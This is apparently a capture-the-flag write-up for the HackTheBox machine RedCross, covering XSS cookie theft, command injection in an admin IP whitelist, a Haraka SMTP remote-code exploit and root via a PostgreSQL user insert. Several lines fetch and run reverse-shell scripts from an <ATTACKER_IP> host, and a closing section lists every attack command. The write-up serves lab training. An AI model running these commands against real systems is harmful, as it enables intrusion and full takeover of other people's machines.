RedCross From HackTheBox was like a maze, with several different paths to achieve shell and root. We’ll start by listing a website and demonstrating two distinct techniques, SQL injection and XSS, for obtaining a cookie that may be used to access the admin panel. Then, using either an exploit in the Haraka SMTP server or an injection into a webpage and manipulation of the PostgreSQL database that manages the users in the ssh jail, We’ll gain access to the box as Penelope. Finally, We’ll demonstrate three different ways to escalate to root, as well as two additional approaches that involve the database among them.
Initial Enumeration & Web Exploitation
I started with an Nmap scan using nmap -A <IP_ADDRESS>
to identify open ports. This revealed ports 22 (SSH), 80 (HTTP – Apache), and 443 (HTTPS – Apache) were open.
I then accessed the website intra.redcross.htb
. I found a login box and a contact form. I performed a directory brute-forcing using dirsearch -u <URL> -k -w <WORDLIST>
(the -k
flag is for SSL), which led me to a /documentation
directory. I then ran another directory search specifically on /documentation
for PDF files using dirsearch -u <URL>/documentation -e pdf -w <WORDLIST>
, discovering an “account signup page” guide.
The documentation revealed that to request credentials, the subject should be “credentials” and the username in the body. I attempted to request admin credentials. I then explored Cross-Site Scripting (XSS) vulnerabilities in the contact form. The first two input boxes (subject and email) weren’t vulnerable, but the third input box (contact phone) was. I used an XSS payload to steal the admin’s cookie, making a request to my attacker’s server, sending the cookie. I started a simple HTTP server (e.g., python -m SimpleHTTPServer 80
) to receive the cookie. I then used the stolen admin cookie (PHP session ID) to impersonate the admin by modifying my browser’s storage.
After logging in as admin, I immediately saw an SQL error, indicating an SQL injection vulnerability. I performed subdomain enumeration using wfuzz -c -w <WORDLIST> -H "Host: FUZZ.redcross.htb" --hw 28 <URL>
(the --hw 28
filtered responses by word count), which discovered the subdomain admin.redcross.htb
.
The admin panel had “User Management” and “Network Access” sections. The “Network Access” section allowed adding IP addresses to a whitelist, likely interacting with iptables
. By intercepting the request to add/deny an IP using Burp Suite, I found a command injection vulnerability. I tested it by appending | ls
to the IP address field when denying an IP. I obtained a reverse shell by injecting commands: first, downloading a shell script (| wget http://<ATTACKER_IP>:<PORT>/shell.sh -O /tmp/shell.sh
) which contained a bash reverse shell, and then executing it (| bash /tmp/shell.sh
). This resulted in a shell as the www-data
user.
Alternative Initial Access Methods (after whitelisting attacker IP)
After whitelisting my attacker’s IP, another Nmap scan revealed more open ports: 1025 (Haraka SMTP) and 5432 (PostgreSQL).
I explored Haraka SMTP Exploitation. Connecting to port 1025 with nc <TARGET_IP> 1025
revealed a Haraka SMTP server. I found the Haraka version was vulnerable to RCE.
- Method 1: Metasploit: I used
msfconsole
, thensearch haraka type:exploit
to find exploits. I used theharaka_smtp_command_injection
module, settingLHOST
,LPORT
,RHOSTS
,RPORT
,EMAIL_FROM
, andEMAIL_TO
. This yielded a Meterpreter shell. - Method 2: Manual Exploit: I downloaded the exploit script from Exploit Database, modified it to target port 1025, and ran it with a command to download and execute a Python reverse shell (
python2 exploit.py -c "wget http://<ATTACKER_IP>/shell.py -O /dev/shm/shell.py; python /dev/shm/shell.py" -s <SENDER_EMAIL> -m <TARGET_IP>
). Theshell.py
contained a Python reverse shell. This resulted in a shell as thepenelope
user.
Privilege Escalation via PostgreSQL
From the www-data
shell (or penelope
shell), I interacted with the local PostgreSQL database. I found connection parameters (username: unix_manager
, database: unix
, password) in a configuration file (e.g., actions
file in the webroot). I connected to PostgreSQL using psql -h localhost -d unix -U unix_manager
and entered the password. I listed tables with \dt
and found a password
table. Viewing its contents with SELECT * FROM password;
showed user trisha
with a hashed password, UID, GID, and home directory.
To escalate privileges, I aimed to insert a new user into the password
table with sudo privileges. I identified the GID for the sudo
or sudoers
group by checking /etc/group
; the GID was 27. I then inserted a new user (e.g., sudo_xxx
) with an MD5 hashed password and GID 27 into the password
table using an SQL command like INSERT INTO password (username, password, uid, gid, homedir) VALUES ('sudo_xxx', '<MD5_HASH_OF_PASSWORD>', <UID>, 27, '/root');
.
Finally, I gained root by SSHing into the machine as the newly created user (sudo_xxx
) with the chosen password (ssh sudo_xxx@<TARGET_IP>
) and then escalating to root using sudo su
.
Technical Commands
Here are the technical commands I used:
nmap -A <IP_ADDRESS>
dirsearch -u <URL> -k -w <WORDLIST>
dirsearch -u <URL>/documentation -e pdf -w <WORDLIST>
python -m SimpleHTTPServer 80
(or similar for HTTP server)wfuzz -c -w <WORDLIST> -H "Host: FUZZ.redcross.htb" --hw 28 <URL>
| ls
(appended to IP in command injection test)| wget http://<ATTACKER_IP>:<PORT>/shell.sh -O /tmp/shell.sh
| bash /tmp/shell.sh
nc <TARGET_IP> 1025
msfconsole
search haraka type:exploit
python2 exploit.py -c "wget http://<ATTACKER_IP>/shell.py -O /dev/shm/shell.py; python /dev/shm/shell.py" -s <SENDER_EMAIL> -m <TARGET_IP>
psql -h localhost -d unix -U unix_manager
\dt
(in psql)SELECT * FROM password;
(in psql)cat /etc/group
INSERT INTO password (username, password, uid, gid, homedir) VALUES ('sudo_xxx', '<MD5_HASH_OF_PASSWORD>', <UID>, 27, '/root');
(in psql)ssh sudo_xxx@<TARGET_IP>
sudo su